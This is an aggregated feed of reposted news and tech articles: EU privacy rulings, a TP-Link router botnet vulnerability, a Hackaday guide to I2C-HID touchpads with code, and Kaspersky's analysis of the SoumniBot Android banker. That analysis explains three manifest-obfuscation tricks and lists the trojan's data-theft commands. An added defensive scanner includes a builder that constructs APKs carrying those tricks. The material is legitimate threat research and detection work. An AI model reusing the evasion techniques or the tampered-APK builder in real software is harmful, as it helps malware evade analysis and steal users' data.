EU data protection body says Meta’s ‘pay or OK’ model is not OK
https://poliverso.org/display/0477a01e-dd1cf63c-e5fa68ada7acd8d0

The European Data Protection Board opposed Meta's controversial "pay or okay" business model in an opinion published on Wednesday (17 April), saying this binary approach was not compliant with the EU's data privacy rules.

https://www.euractiv.com/section/platforms/news/eu-data-protection-body-says-metas-pay-or-ok-model-is-not-ok/




Letta’s report aligns with views of major telecoms on market integration
https://poliverso.org/display/0477a01e-2137ea19-7d4e160aafff8a6a

Laying out his vision of a harmonised single market in the telecommunications sector, former Italian prime minister Enrico Letta aligned with some of the talking points by the EU's largest telecom players, according to a draft report seen by Euractiv.

https://www.euractiv.com/section/digital/news/lettas-report-aligns-with-views-of-major-telecoms-on-market-integration/




TP-Link Routers Are Caught in the Crossfire of DDoS Attacks
https://poliverso.org/display/0477a01e-e8cc89f2-74b118e201ae0e49
https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread
https://www.redhotcyber.com/post/vulnerabilita-cve-2024-21893-ivanti-colpito-da-hacker-cinesi-unc5325-e-unc3886/

Fortinet reports that attackers continue to exploit a year-old vulnerability in TP-Link routers, adding the routers to various botnets in order to carry out DDoS attacks.

The command injection vulnerability CVE-2023-1389 (CVSS score: 8.8) was discovered in December 2022 at the Pwn2Own event in Toronto and patched in March 2023.

The bug affects the popular TP-Link Archer AX21 model, which has long been in the crosshairs of botnet operators.

Fortinet has observed numerous attacks exploiting this security flaw, including by the Mirai and Condi botnet malware. The malicious code lets the attackers take control of the devices to launch DDoS attacks.
Fortinet telemetry
In April 2023 it emerged that cybercriminals had taken advantage of the same vulnerability to attack TP-Link routers located mainly in Eastern Europe and add them to the Mirai botnet.

Experts urge users to stay vigilant against DDoS botnets and to apply patches promptly, to protect their network environment from infection and to keep their routers from becoming bots.

The article TP-Link Routers Are Caught in the Crossfire of DDoS Attacks originally appeared on il blog della sicurezza informatica.





Human-Interfacing Devices: HID over I2C
https://poliverso.org/display/0477a01e-95938951-19d90b0f2c178566
https://hackaday.com/2024/01/30/human-interfacing-devices-the-descriptor-heist/
https://hackaday.com/2024/02/06/human-interfacing-devices-packing-for-the-descriptor-heist/

In the previous two HID articles, we talked about stealing HID descriptors, learned about a number of cool tools you can use for HID hacking on Linux, and created a touchscreen device. This time, let’s talk about an underappreciated HID standard, but one that you might be using right now as you’re reading this article – I2C-HID, or HID over I2C.

HID as a protocol can be tunneled over many different channels. If you’ve used a Bluetooth keyboard, for instance, you’ve used tunneled HID. For about ten years now, I2C-HID has been heavily present in the laptop space: it was initially used in touchpads, later in touchscreens, and now also in sensor hubs. Yes, you can expose sensor data over HID, and if you have a clamshell (foldable) laptop, that’s how the rotation-determining accelerometer exposes its data to your OS.

This capacitive touchscreen controller is not I2C-HID, even though it is I2C. By [Raymond Spekking], CC-BY-SA 4.0

Not every I2C-connected input device is I2C-HID. For instance, if you’ve seen older tablets with I2C-connected touchscreens, don’t get your hopes up, as they likely don’t use HID – it’s just a complex-ish I2C device, with enough proprietary registers and commands to drive you crazy even if your logic analysis skills are on point. I2C-HID is nowhere near that, and it’s also way better than the PS/2 we used before – an x86-only interface with limited capabilities, already almost extinct from even x86 boards, and further threatened in this increasingly RISCy world. I2C-HID is low-power, especially compared to USB, as capable as HID goes, compatible with existing HID software, and ubiquitous enough that you surely already have an I2C port available on your SBC.

In the modern world of input devices, I2C-HID is spreading, and the coolest thing is that it’s standardized. The standardization means a lot of great things for us hackers. For one, unlike all of those I2C touchscreen controllers, I2C-HID devices are easier to reuse; as much as information on them might be lacking at the moment, that’s what we’re combating right now as we speak! If you are using a recent laptop, the touchpad is most likely I2C-HID. Today, let’s take a look at converting one of those touchpads to USB HID.

A Hackable Platform

Two years ago, I developed a Framework laptop input cover controller board. Back then, I knew some things about I2C-HID, but not too much, and it kinda intimidated me. Still, I wired up the I2C pins to an I2C port on an RP2040, wired up the INT pin to a GPIO, successfully detected an I2C device on those I2C pins with a single line of MicroPython code, and left it sitting on my desk out of dread over converting touchpad data into mouse events – as it turns out, it was way simpler than I thought.

There’s a specification from Microsoft, and it might be your first jumping point. I tried reading the specification, but I didn’t understand HID at the time either, so that didn’t help much. Looking back, the specification is pretty hard to read, regardless. Here’s the deal in the real world.

If you want to get the HID descriptor from an I2C-HID device, you only need to read a block of data from its registers. Receiving reports (HID event packets) is simple, too. When the INT pin goes low, read a block of data from the device – you will receive a HID report. If there’s an RST pin, you will want to bring it down upon bootup for a few hundred milliseconds to reset the device, and you can use it in case your I2C-HID device malfunctions, too.

Now, there are malfunctions, and there definitely will be quirks. Since HID is ubiquitous, there are myriad ways for manufacturers to abuse it. For instance, touchpads are so ubiquitous that Chrome OS has entire layers dealing with their quirks. But here we are, and I have an I2C device connected to an RP2040, previous MicroPython I2C work in hand, some LA captures between the touchpad and the original system stashed away, and I’m ready to send it all commands it needs.

Poking And Probing


To read the descriptor, you can read a block from register 0x20, where the first four bytes define the descriptor version and the descriptor length – counting these four bytes in. When we put this descriptor into the decoder, we will get something like this:

[...]
0x05, 0x0D, // Usage Page (Digitizer)
0x09, 0x05, // Usage (Touch Pad)
0xA1, 0x01, // Collection (Application)
0x85, 0x01, // Report ID (1)
0x05, 0x0D, // Usage Page (Digitizer)
0x09, 0x22, // Usage (Finger)
0xA1, 0x02, // Collection (Logical)
0x09, 0x47, // Usage (Confidence)
0x09, 0x42, // Usage (Tip Switch)
0x15, 0x00, // Logical Minimum (0)
0x25, 0x01, // Logical Maximum (1)
[...]

That is a HID descriptor for a touchpad alright! Save this descriptor somewhere – while getting it dynamically is tempting, hardcoding it into your firmware also might be a viable decision, depending on which kind of firmware you’ll be adding I2C-HID support into, and, you’ll really want to have it handy as a reference. Put this descriptor into our favourite decoder website, and off we go! Oh, and if you can’t extract the descriptor from the touchpad for whatever reason, you can get it from inside a running OS like I’ve done in the last article – that’s what I ended up doing, because I couldn’t make MicroPython fetch the descriptor properly.
For some reason, Microsoft decided to distribute this spec as a .docx file, something that I immediately abused as a way of stress relief
Take a look at the report IDs – they can be helpful later. All reports coming from the touchpad will have their report ID attached, and it’s good to know just which kinds of events you can actually expect. Also, here’s a challenge – try to spot the reports used for BIOS “simple mouse” functionality, firmware update, touchpad calibration, and any proprietary features!

Now, all that’s left is getting the reports. This is simple too – you don’t even need to read a block from a register, just a block of data from the touchpad. First, you read a single byte, which tells you how many more bytes you need to read to get the actual packet; you do this read once INT is asserted (set low), which means the touchpad has data for you. If your INT doesn’t work for some reason, as it was on my board, you can continuously poll the touchpad in a loop instead, reading a single byte each time, and reading out a full packet when the first byte isn’t 0x00. Then, it’s the usual deal – the byte after the length is the report ID, and all other bytes are the actual report contents. For I2C code of the kind that our last article uses, reading a report works like this:
from time import sleep
from machine import I2C, Pin
import usb_hid  # USB HID module of the MicroPython fork from the last article

# bus number and pins are placeholders; use whatever your touchpad is wired to
i2c = I2C(0, scl=Pin(1), sda=Pin(0))

while True:
    try:
        # the first byte of the input report is the (low byte of the) report length
        l = i2c.readfrom(0x2c, 1)[0]
        if l:
            # read the whole report: two length bytes, the report ID, then the data
            d = i2c.readfrom(0x2c, l)
            if d[2] != 0x01:
                # only forward packets with a specific report ID, discard all others
                print("WARNING")
                print(l, d)
                print("WARNING")
            else:
                d = d[3:]
                print(l, len(d), d)
                usb_hid.report(usb_hid.MOUSE_ABS, d)
    except OSError:
        # touchpad unplugged? retry in a bit
        sleep(0.01)

Now, touch the touchpad, and see. Got a report? Wonderful! Haven’t received anything yet? There are a few things to check. First, your touchpad might require a TP_EN pin to be asserted low or high. Also, if your touchpad has a TP_RST pin, you might need to pull it low on startup for a couple hundred milliseconds. Other than that, if your touchpad is from a reasonably popular laptop, see if there’s any references for its quirks in the Linux kernel, or any of the open firmwares out there.

Further Integration


Theoretically, you could write a pretty universal I2C-HID to USB-HID converter fairly easily – that would allow things like USB-connected touchpads on the cheap, just like some people have been doing with PS/2 in the good old days. For me, there’s an interesting question – how do you actually integrate this into a keyboard firmware? There are a few options. For instance, you could write a QMK module for dealing with any sort of I2C-HID device, that’d pass through reports from the touchpad and generate its own reports for the keyboard. That is a viable option for most of you; for me, C++ is not my friend as much as I’d like it to be.

There’s the MicroPython option we explored in the last article, and that’s what I’m using for forwarding at the moment. This option needs the descriptor translated into TUSB macros, which took a bit of time, but I could make it work. Soon, USB device support will be added in the new MicroPython release, which will make my translation work obsolete in all the best ways, but it isn’t merged just yet. More importantly, however, there’s no stock keyboard code I could find that’s compatible with this firmware, and as much as it could be educational, I’m not looking into writing my own keyboard scanning code.

Currently, I’m looking into a third option, KMK. A CircuitPython-based keyboard firmware, it should allow things like dynamic descriptor definitions, which lets us save a fair bit of time when iterating on descriptor hacking, especially compared to the MicroPython fork.

All of these options need you to merge keyboard and touchpad descriptors into one, which makes sense. The only caveat is the question of conflicting report IDs between the stock firmware keyboard descriptor and the stock touchpad descriptor. For fixing that, you’d want to rewrite report IDs on the fly – not that it’s complicated, just a single byte substitution, but it’s a good caveat to keep in mind! My touchpad code already does this because the library does automatic report ID insertion, but if yours doesn’t, make sure they’re changed.
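As an added example (not code from the article or its author), here is a small Python decoder and report framer covering the two protocol details above: walking the short items of a report descriptor to list the Report IDs it declares, and splitting raw input-report bytes on their length field, dropping unwanted report IDs and substituting the ID byte before forwarding. The descriptor and report bytes are constructed samples, and the framer reads the full two-byte little-endian length rather than the single byte the MicroPython loop reads.

```python
"""Added example, not code from the Hackaday article or its author.
decode_items/report_ids walk a HID report descriptor (short items, as in the
decoder listing above) and collect its Report IDs; frame_reports/forward_reports
split raw input-report bytes on the 2-byte length field, drop unwanted report
IDs and substitute the ID byte so a merged keyboard+touchpad descriptor has no
collisions. All byte strings are constructed samples, not touchpad captures."""
from typing import Dict, Iterator, List, Tuple

# (bType, bTag) -> item name; only the items used in the article's excerpt
ITEM_NAMES = {
    (0, 0x8): "Input", (0, 0x9): "Output", (0, 0xA): "Collection",
    (0, 0xB): "Feature", (0, 0xC): "End Collection",
    (1, 0x0): "Usage Page", (1, 0x1): "Logical Minimum",
    (1, 0x2): "Logical Maximum", (1, 0x7): "Report Size",
    (1, 0x8): "Report ID", (1, 0x9): "Report Count",
    (2, 0x0): "Usage",
}

def decode_items(desc: bytes) -> List[Tuple[str, int]]:
    """Decode HID short items: prefix = bTag(7:4) | bType(3:2) | bSize(1:0)."""
    items, i = [], 0
    while i < len(desc):
        prefix = desc[i]
        if prefix == 0xFE:  # long item: bDataSize, bLongItemTag, data; skip it
            i += 3 + desc[i + 1]
            continue
        size = prefix & 0x3
        size = 4 if size == 3 else size  # bSize 3 means four data bytes
        if i + 1 + size > len(desc):
            raise ValueError("truncated item at offset %d" % i)
        value = int.from_bytes(desc[i + 1:i + 1 + size], "little")
        key = ((prefix >> 2) & 0x3, prefix >> 4)
        items.append((ITEM_NAMES.get(key, "Unknown 0x%02X" % prefix), value))
        i += 1 + size
    return items

def report_ids(desc: bytes) -> List[int]:
    """Report IDs declared in the descriptor, in order of first appearance."""
    seen: List[int] = []
    for name, value in decode_items(desc):
        if name == "Report ID" and value not in seen:
            seen.append(value)
    return seen

def frame_reports(raw: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (report_id, payload) per report. A report opens with a little-endian
    length that counts itself, byte 2 is the report ID, the rest is payload (the
    d[2] / d[3:] split above). Zero length = idle device, nothing pending."""
    i = 0
    while i + 2 <= len(raw):
        length = int.from_bytes(raw[i:i + 2], "little")
        if length == 0:
            i += 2
            continue
        if length < 3 or i + length > len(raw):
            raise ValueError("bad report length %d at offset %d" % (length, i))
        yield raw[i + 2], raw[i + 3:i + length]
        i += length

def forward_reports(raw: bytes, remap: Dict[int, int]) -> List[bytes]:
    """USB-side reports (new ID byte + payload) for wanted IDs only; remap maps
    touchpad report ID -> ID in the merged descriptor, other IDs are dropped."""
    out = []
    for rid, payload in frame_reports(raw):
        if rid in remap:
            out.append(bytes([remap[rid]]) + payload)
    return out

# Constructed sample descriptor: Report ID 1 is the finger report, Report ID 2
# a vendor report we do not forward.
DESCRIPTOR = bytes([
    0x05, 0x0D, 0x09, 0x05, 0xA1, 0x01,  # Usage Page (Digitizer), Usage (Touch Pad), Collection
    0x85, 0x01, 0x09, 0x22, 0xA1, 0x02,  # Report ID (1), Usage (Finger), Collection (Logical)
    0x09, 0x47, 0x09, 0x42,              # Usage (Confidence), Usage (Tip Switch)
    0x15, 0x00, 0x25, 0x01,              # Logical Minimum (0), Logical Maximum (1)
    0x75, 0x01, 0x95, 0x02, 0x81, 0x02,  # Report Size (1), Report Count (2), Input
    0xC0, 0x85, 0x02, 0x09, 0x01,        # End Collection, Report ID (2), Usage (1)
    0x75, 0x08, 0x95, 0x04, 0x81, 0x02,  # Report Size (8), Report Count (4), Input
    0xC0,                                # End Collection
])
# Constructed run of input-register reads: idle answers interleaved with reports.
RAW_READS = bytes([
    0x00, 0x00,                                # idle: nothing pending
    0x07, 0x00, 0x01, 0x03, 0x10, 0x20, 0x00,  # len 7, ID 1, payload 03 10 20 00
    0x07, 0x00, 0x02, 0xDE, 0xAD, 0xBE, 0xEF,  # len 7, ID 2 vendor report: dropped
    0x00, 0x00,
    0x07, 0x00, 0x01, 0x01, 0x11, 0x21, 0x00,  # second finger report
])

if __name__ == "__main__":
    for name, value in decode_items(DESCRIPTOR):
        print("%-16s 0x%02X" % (name, value))
    print("report IDs:", report_ids(DESCRIPTOR))
    # touchpad report 1 becomes report 3 in the merged keyboard+touchpad descriptor
    for rep in forward_reports(RAW_READS, {1: 3}):
        print(rep.hex())
```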

Even Easier Reuse


Now, all of this was about tunneling I2C-HID-obtained HID events into USB. Are you using something like a Raspberry Pi? Good news! There’s i2c-hid support in the Linux kernel, which only really wants the IRQ GPIO and the I2C address of your I2C device. Basically, all you need to do is to add a device tree fragment and some very minimal data. I don’t have a tutorial for this, but there’s some initial documentation in the kernel tree, and grepping the device tree directory for the overlay name alone should give you a wonderful start.

This article isn’t long, and that’s because of just how easy I2C-HID is to work with. Now, of course, there are quirks – just check out this file for some examples. Still, it’s nothing that you couldn’t figure out with a logic analyzer, and now you can see just how easy this is. I hope that this can help you on your hacking forays, so whenever you next see a laptop touchpad, you know just how easy they can be to wire up, no matter if you’re using a microcontroller or a Raspberry Pi.




Custom Dog Door Prevents Culinary Atrocities
https://poliverso.org/display/0477a01e-3e79ba15-dab17fe37574fe8f

Riley, an 8 lb pug, has more beauty than brains, and a palate as unrefined as crude oil. While we hate criticizing others’ interests and tastes, his penchant for eating cat poop needed to stop. After a thorough exploration of a variety of options, including cat food additives that make its excrement taste worse (HOW? WHY? Clearly taste wasn’t the issue!), automatic litter boxes that stow the secretions, and pet doors that authenticate access to the room with the litter box, [Science Buddies] eventually settled on a solution that was amenable to all members of the family.

The trick was in creating a door mechanism with a blacklist of sorts rather than a whitelist. As the cat didn’t like to push the door open itself, the solution needed to have the pet door open by default. A magnet on Riley’s collar would trip a sensor attached to an Arduino that would control servos to swing the door shut immediately if he attempted to access the defecated delights. Of course safety was a consideration with the door swinging in Riley’s face.

We’ve covered a few pet screeners, including one for the same purpose that used IR sensors (but a much bigger dog also named Riley), and a flock of solutions for chickens. We’ve also seen [Science Buddies] in previous posts, so they’re not on the tips line blacklist.

https://www.youtube.com/embed/Djzx54j-2ZU?feature=oembed




Bot Forever! Half of web traffic is fake. Bots will soon be the masters of the internet
https://poliverso.org/display/0477a01e-dc78fabd-c0e3d6c9f153c1d7
https://www.securitylab.ru/glossary/thales/

According to Thales' annual Imperva Bad Bot report, almost half (49.6%) of all internet traffic in 2023 came from bot activity. That is 2% more than a year earlier and the highest figure since 2013.

Particularly worrying is that malicious bot traffic has grown to 32% of the total, while the share of real users is steadily falling. This trend is having a negative impact on organizations worldwide and is estimated to cost billions of dollars every year through attacks on websites, APIs and various applications.

Which bots are to blame


The most common type of malicious bot is a specialized program that performs specific tasks with criminal intent, such as assisting in cybercrime, theft or fraud campaigns. Particularly high levels of their activity were recorded in Ireland, Germany and Mexico, while only a slight increase was observed in the United States.

According to the report, the development of technologies, including generative artificial intelligence, has contributed to the growth of simple bots: their share rose from 33% in 2022 to 39% in 2023. The algorithms are also becoming more sophisticated over time.

For example, in 2023, 44% of all malicious bot traffic came from programs disguised as mobile users. Such tools typically use residential and mobile proxies to hide their true origin and avoid detection.

The report also documents the rise of more advanced bots able to mimic the behaviour of real people and successfully bypass security measures. In most cases they targeted the legal, government, entertainment and financial services sectors.

Bots will soon overtake human-generated traffic


Separately, it is worth noting the growth in account takeover (ATO) attacks, which became 10% more frequent. Almost half of these incidents were directed against APIs. The most frequent victims were companies in the financial, travel and economic sectors.

“Automated bots will soon exceed the share of internet traffic coming from humans, fundamentally changing the way organizations build and protect their web assets,” warns Nanhi Singh, general manager of application security at Imperva.

To counter the growing threat, organizations must be more vigilant and implement effective defences, particularly against API abuse attacks that can lead to account compromise and data theft.

The article Bot Forever! Half of web traffic is fake. Bots will soon be the masters of the internet originally appeared on il blog della sicurezza informatica.




What are the responsibilities and liabilities of #FreeSoftware developers?
🚨 A potential threat to Free Software developers looms in the form of an ongoing lawsuit in the UK involving Bitcoin and its core developers.

https://fsfe.org/news/2024/news-20240417-01.html

#SoftwareFreedom #Bitcoin #BitcoinCase



Getting Started with Radio Astronomy
https://poliverso.org/display/0477a01e-f5c2927d-7e3827149e9b9a1a

There are many facets to being a radio hobbyist, but if you’ve ever had the urge to dabble in radio astronomy, check out “The Novice’s Guide to Amateur Radio Astronomy,” a presentation at the 2024 conference of the Society of Amateur Radio Astronomers. In that presentation (see the video below), [Nathan Butts] covers everything from why you should take up the hobby, how to set up a software defined radio (SDR) receiver, and how to repurpose old computers. This is just one of a series of videos recently posted from the conference — check out their channel to see them all.

Unlike optical astronomy, you can listen to the universe by radio during the day or night, rain or shine. You don’t need a dark sky, although these days, a quiet radio location might be hard to find. [Nathan] also points out that some people just want to crunch data collected by others, and that’s fun, too. There are many ways to get involved from designing hardware, writing software, or — of course — just listening.

It has never been easier to get involved. Cheap software-defined radios are perfect for this sort of work, and we all have massive computers and scores of small data-collection computers. Maybe you’ll be the next person to hear a Wow signal. If you are worried about fielding an antenna, many people repurpose satellite dishes.

https://www.youtube.com/embed/uz15GmR_aXc?feature=oembed




European space industry needs a single market approach, recommends Letta report
https://poliverso.org/display/0477a01e-f4cde9b4-e12ff906ce02745b
European space industry needs a single market approach, recommends Letta reportThe EU space market should be integrated, because the European space industry is no longer adequate to compete in the current global space economy, Italian MP Enrico Letta writes in his draft full report as seen by Euractiv.euractiv.com/section/industria…




The EU space market should be integrated, because the European space industry is no longer adequate to compete in the current global space economy, Italian MP Enrico Letta writes in his draft full report as seen by Euractiv.


https://www.euractiv.com/section/industrial-strategy/news/european-space-industry-needs-a-single-market-approach-recommends-letta-report/


The Privacy Post reshared this.


The Privacy Post reshared this.


🥳WIN: Today, @eu_edpb heard civil society's voices to stand up for people's right to have control over their data.

@POLITICOEurope reports: EDPB opposed #Meta plan to charge for privacy. #PayorOkay

EDRi's Policy Advisor @itxaso explains why privacy is not for sale for @euronews: https://www.euronews.com/next/2024/04/15/meta-must-stop-charging-for-peoples-right-to-privacy

reshared this



EDPB opinion: Meta cannot rely on "Pay or Okay"
First update on the EDPB "Pay or Okay" opinion on the largest platforms.
16 April 2024
Meta


https://noyb.eu/it/statement-edpb-pay-or-okay-opinion


The Privacy Post reshared this.


SoumniBot: the new Android banker’s unique techniques
https://poliverso.org/display/0477a01e-3dca6bec-de11670c9ba46f23




The creators of widespread malware programs often employ various tools that hinder code detection and analysis, and Android malware is no exception. As an example of this, droppers, such as Badpack and Hqwar, designed for stealthily delivering Trojan bankers or spyware to smartphones, are very popular among malicious actors who attack mobile devices. That said, we recently discovered a new banker, SoumniBot, which targets Korean users and is notable for an unconventional approach to evading analysis and detection, namely obfuscation of the Android manifest.

SoumniBot obfuscation: exploiting bugs in the Android manifest extraction and parsing procedure


Any APK file is a ZIP archive with AndroidManifest.xml in the root folder. This file contains information about the declared components, permissions and other app data, and helps the operating system to retrieve information about various app entry points. Just like the operating system, the analyst starts by inspecting the manifest to find the entry points, which is where code analysis should start. This is likely what motivated the developers of SoumniBot to research the implementation of the manifest parsing and extraction routine, where they found several interesting opportunities to obfuscate APKs.

Technique 1: Invalid Compression method value


This is a relatively well-known technique used by various types of malware including SoumniBot and associated with the way manifests are unpacked. In the libziparchive library, the standard unarchiving function permits only two Compression method values in the record header: 0x0000 (STORED, that is uncompressed) and 0x0008 (DEFLATED, that is compressed with deflate from the zlib library), or else it returns an error.

libziparchive unarchiving algorithm

Yet, instead of using this function, the developers of Android chose to implement an alternate scenario, where the value of the Compression method field is validated incorrectly.

Manifest extraction procedure

If the APK parser comes across any Compression method value but 0x0008 (DEFLATED) in the APK for the AndroidManifest.xml entry, it considers the data uncompressed. This allows app developers to put any value except 8 into Compression method and write uncompressed data. Although any unpacker that correctly implements compression method validation would consider a manifest like that invalid, the Android APK parser recognizes it correctly and allows the application to be installed. The image below illustrates the way the technique is executed in the file b456430b4ed0879271e6164a7c0e4f6e.

Invalid Compression method value followed by uncompressed data

Technique 2: Invalid manifest size


Let’s use the file 0318b7b906e9a34427bf6bbcf64b6fc8 as an example to review the essence of this technique. The header of AndroidManifest.xml entry inside the ZIP archive states the size of the manifest file. If the entry is stored uncompressed, it will be copied from the archive unchanged, even if its size is stated incorrectly. The manifest parser ignores any overlay, that is information following the payload that’s unrelated to the manifest. The malware takes advantage of this: the size of the archived manifest stated in it exceeds its actual size, which results in overlay, with some of the archive content being added to the unpacked manifest. Stricter manifest parsers wouldn’t be able to read a file like that, whereas the Android parser handles the invalid manifest without any errors.

The stated size of the manifest is much larger than its actual size

Note that although live devices interpret these files as valid, apkanalyzer, Google’s own official utility for analyzing assembled APKs, cannot handle them. We have notified Google accordingly.

Technique 3: Long namespace names


The SoumniBot malware family, for example the file fa8b1592c9cda268d8affb6bceb7a120, has used this technique as well. The manifest contains very long strings, used as the names of XML namespaces.

Very long strings in the manifest…

…used as namespace names

Manifests that contain strings like these become unreadable for both humans and programs, and the latter may not be able to allocate enough memory to process them. The manifest parser in the OS itself completely ignores namespaces, so the manifest is handled without errors.
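
All three tricks above are visible from the APK's own bytes, which makes them useful triage signals for a defender. The Python scanner below is an added example written for this post, not Kaspersky's tooling and not code from the samples: it parses the ZIP central directory and local headers itself, so that entry boundaries come from header offsets rather than from the sizes the archive declares, then flags an AndroidManifest.xml entry whose Compression method is neither 0 nor 8 (technique 1), a declared size that runs past the bytes physically present in the entry (technique 2), and abnormally long strings in the manifest's binary-XML string pool (technique 3). The APK it scans is constructed inline around a minimal string-pool-only manifest; the 256-character threshold, the method value 19 and the 300-byte overrun are illustrative choices, not values taken from SoumniBot.

```python
import struct
import zlib

SIG_LOCAL, SIG_CENTRAL, SIG_EOCD = 0x04034B50, 0x02014B50, 0x06054B50   # ZIP record signatures
RES_XML_TYPE, RES_STRING_POOL_TYPE, UTF8_FLAG = 0x0003, 0x0001, 0x100   # binary-XML (AXML) chunk types
MANIFEST = "AndroidManifest.xml"
MAX_STRING_LEN = 256  # illustrative threshold; genuine manifest strings are far shorter

def parse_central_directory(data: bytes) -> list[dict]:
    """Pair each central-directory record with its local header; boundaries come from offsets, not sizes."""
    eocd = data.rfind(struct.pack("<I", SIG_EOCD))
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    count, _, cd_off = struct.unpack_from("<HII", data, eocd + 10)
    entries, pos = [], cd_off
    for _ in range(count):
        (sig, _, _, _, method, _, _, _, csize, usize, nlen, xlen, clen,
         _, _, _, loff) = struct.unpack_from("<IHHHHHHIIIHHHHHII", data, pos)
        if sig != SIG_CENTRAL:
            raise ValueError("corrupt central directory")
        lsig, _, _, lmethod, _, _, _, _, _, lnlen, lxlen = struct.unpack_from("<IHHHHHIIIHH", data, loff)
        if lsig != SIG_LOCAL:
            raise ValueError("bad local header offset")
        entries.append({"name": data[pos + 46:pos + 46 + nlen].decode("utf-8", "replace"),
                        "method": method, "local_method": lmethod, "csize": csize, "usize": usize,
                        "offset": loff, "data_start": loff + 30 + lnlen + lxlen})
        pos += 46 + nlen + xlen + clen
    bounds = sorted(e["offset"] for e in entries) + [cd_off]
    for e in entries:  # bytes physically present before the next header begins
        e["available"] = min(b for b in bounds if b > e["offset"]) - e["data_start"]
    return entries

def _pool_len(b: bytes, off: int) -> tuple[int, int]:
    # UTF-8 string-pool length prefix: one byte, or two when the high bit is set.
    return (((b[off] & 0x7F) << 8) | b[off + 1], off + 2) if b[off] & 0x80 else (b[off], off + 1)

def manifest_strings(blob: bytes) -> list[str]:
    """Return the string pool of a binary-XML manifest (UTF-8 pools only)."""
    if len(blob) < 36 or struct.unpack_from("<H", blob)[0] != RES_XML_TYPE:
        return []
    ptype, _, _, count, _, flags, strings_start, _ = struct.unpack_from("<HHIIIIII", blob, 8)
    if ptype != RES_STRING_POOL_TYPE or not flags & UTF8_FLAG:
        return []
    out = []
    for i in range(count):
        off = 8 + strings_start + struct.unpack_from("<I", blob, 36 + 4 * i)[0]
        _, off = _pool_len(blob, off)       # character count, not needed here
        nbytes, off = _pool_len(blob, off)  # byte count
        out.append(blob[off:off + nbytes].decode("utf-8", "replace"))
    return out

def scan_apk(data: bytes) -> list[str]:
    """Report the three manifest anomalies; an empty list means none were found."""
    findings = []
    for e in (x for x in parse_central_directory(data) if x["name"] == MANIFEST):
        if e["method"] not in (0, 8) or e["local_method"] not in (0, 8):
            findings.append(f"invalid compression method {e['method']} on {MANIFEST}")
        if e["csize"] > e["available"]:
            findings.append(f"declared size {e['csize']} exceeds {e['available']} bytes present (overlay)")
        raw = data[e["data_start"]:e["data_start"] + min(e["csize"], e["available"])]
        blob = zlib.decompress(raw, -15) if e["method"] == 8 else raw  # Android: anything but 8 is stored
        for s in manifest_strings(blob):
            if len(s) > MAX_STRING_LEN:
                findings.append(f"string pool entry of {len(s)} chars (possible namespace padding)")
    return findings

def _pool_str(s: str) -> bytes:
    # One UTF-8 pool entry: char length, byte length, bytes, NUL terminator.
    enc = lambda n: bytes([0x80 | n >> 8, n & 0xFF]) if n >= 0x80 else bytes([n])
    return enc(len(s)) + enc(len(s.encode())) + s.encode() + b"\x00"

def build_manifest(strings: list[str]) -> bytes:
    """Constructed minimal AXML: a header plus a UTF-8 string pool and nothing else."""
    items = [_pool_str(s) for s in strings]
    offsets = [sum(len(x) for x in items[:i]) for i in range(len(items))]
    start, body = 28 + 4 * len(items), b"".join(items)
    pool = struct.pack("<HHIIIIII", RES_STRING_POOL_TYPE, 28, start + len(body), len(items), 0, UTF8_FLAG, start, 0)
    pool += b"".join(struct.pack("<I", o) for o in offsets) + body
    return struct.pack("<HHI", RES_XML_TYPE, 8, 8 + len(pool)) + pool

def build_apk(entries: list[tuple[str, bytes, int, int]]) -> bytes:
    """Assemble a ZIP from (name, payload, method, declared_size); declared_size is written unchecked."""
    body, central = b"", b""
    for name, payload, method, declared in entries:
        nm, crc, off = name.encode(), zlib.crc32(payload), len(body)
        body += struct.pack("<IHHHHHIIIHH", SIG_LOCAL, 20, 0, method, 0, 0, crc, declared, declared, len(nm), 0) + nm + payload
        central += struct.pack("<IHHHHHHIIIHHHHHII", SIG_CENTRAL, 20, 20, 0, method, 0, 0, crc,
                               declared, declared, len(nm), 0, 0, 0, 0, 0, off) + nm
    eocd = struct.pack("<IHHHHIIH", SIG_EOCD, 0, 0, len(entries), len(entries), len(central), len(body), 0)
    return body + central + eocd

def sample_apk(tampered: bool) -> bytes:
    """Constructed two-entry APK; with tampered=True it carries all three tricks."""
    ns = "x" * 4000 if tampered else "http://schemas.android.com/apk/res/android"  # technique 3
    manifest = build_manifest(["manifest", "android", ns, "package"])
    method = 19 if tampered else 0                                 # technique 1: bogus method value
    declared = len(manifest) + 300 if tampered else len(manifest)  # technique 2: size overruns the entry
    return build_apk([(MANIFEST, manifest, method, declared), ("classes.dex", b"\x00" * 72, 0, 72)])
```

`scan_apk(sample_apk(False))` returns an empty list and `scan_apk(sample_apk(True))` returns one finding per technique. The point of parsing the ZIP by hand is the one the report makes about apkanalyzer: a strict unpacker rejects these files outright and tells you nothing, so a triage tool has to read the structure as leniently as the Android parser does and only then apply the stricter checks.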

What’s under the obfuscation: SoumniBot’s functionality


When started, the application requests a configuration with two parameters, mainsite and mqtt, from the server, whose address is a hardcoded constant.

Parameter request

Both parameters are server addresses, which the malware needs for proper functioning. The mainsite server receives collected data, and mqtt provides MQTT messaging functionality for receiving commands. If the source server did not provide these parameters for some reason, the application will use the default addresses, also stored in the code.

After requesting the parameters, the application starts a malicious service. If it cannot start or stops for some reason, a new attempt is made every 16 minutes. When run for the first time, the Trojan hides the app icon to complicate removal, and then starts to upload data in the background from the victim’s device to mainsite every 15 seconds. The data includes the IP address, country deduced from that, contact and account lists, SMS and MMS messages, and the victim’s ID generated with the help of the trustdevice-android library. The Trojan also subscribes to messages from the MQTT server to receive the commands described below.

# | Description | Parameters
0 | Sends information about the infected device: phone number, carrier, etc., and the Trojan version, followed by all of the victim’s SMS messages, contacts, accounts, photos, videos and online banking digital certificates. | –
1 | Sends the victim’s contact list. | –
2 | Deletes a contact on the victim’s device. | data: the name of the contact to delete
3 | Sends the victim’s SMS and MMS messages. | –
4 | A debugging command likely to be replaced with sending call logs in a new version. | –
5 | Sends the victim’s photos and videos. | –
8 | Sends an SMS message. | data: ID that the malware uses to receive a message to forward. The Trojan sends the ID to mainsite and gets message text in return.
24 | Sends a list of installed apps. | –
30 | Adds a new contact on the device. | name: contact name; phoneNum: phone number
41 | Gets ringtone volume levels. | –
42 | Turns silent mode on or off. | data: a flag set to 1 to turn on silent mode and to 0 to turn it off
99 | Sends a pong message in response to an MQTT ping request. | –
100 | Turns on debug mode. | –
101 | Turns off debug mode. | –

